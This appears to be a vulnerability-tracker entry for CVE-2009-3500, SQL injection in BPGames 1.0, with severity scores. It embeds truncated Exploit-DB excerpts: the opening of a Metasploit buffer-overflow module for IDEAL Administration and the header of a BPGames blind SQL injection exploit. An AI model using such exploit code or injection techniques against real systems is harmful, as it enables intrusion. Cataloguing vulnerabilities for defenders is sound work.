CVE-2009-3500
published 2009-09-30CVE-2009-3500: Multiple SQL injection vulnerabilities in BPowerHouse BPGames 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) cat_id parameter to…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.99%
58.2th percentile
Multiple SQL injection vulnerabilities in BPowerHouse BPGames 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) cat_id parameter to main.php and (2) game_id parameter to game.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bpowerhouse | bpgames | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit)
exploitdb·2009-12-06
CVE-2009-4265 PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit)
PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit)
---
require 'msf/core'
class Metasploit3 'IDEAL Administration 2009 Buffer Overflow - Universal',
'Description' => %q{
This module exploits a stack overflow in IDEAL Administration v9.7.
By creating a specially crafted ipj file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'dookie, original by Dr_IDE' ],
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x3c\x22\x3e\x1a\x0a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => 0x10010F2E } ], # ListWmi.dll
Exploit-DB
BPGames 1.0 - Blind SQL Injection
exploitdb·2009-09-22
CVE-2009-3500 BPGames 1.0 - Blind SQL Injection
BPGames 1.0 - Blind SQL Injection
---
#[x]===================================================================[x]
# | AntiSecurity[dot]org |
#[x]===================================================================[x]
# | Title : BPGames 1.0 blind SQL Injection Exploit |
# | Software : BPGames |
# | Vendor : http://bpowerhouse.info |
# | Date : 22 September 2009 ( Indonesia ) |
# | Author : OoN_Boy |
# | Contact : [email protected] |
# | Web : http://oonboy.info |
# | Blog : http://oonboy.blogspot.com |
#[x]===================================================================[x]
# | Technology : PHP |
# | Database : MySQL |
# | Version : 1.0 |
# | License : GNU GPL |
# | Price : $29.90 |
# | Description : is a game directory site script. The script |
# | supports multi-language settings. Sit
No writeups or analysis indexed.
2009-09-30
Published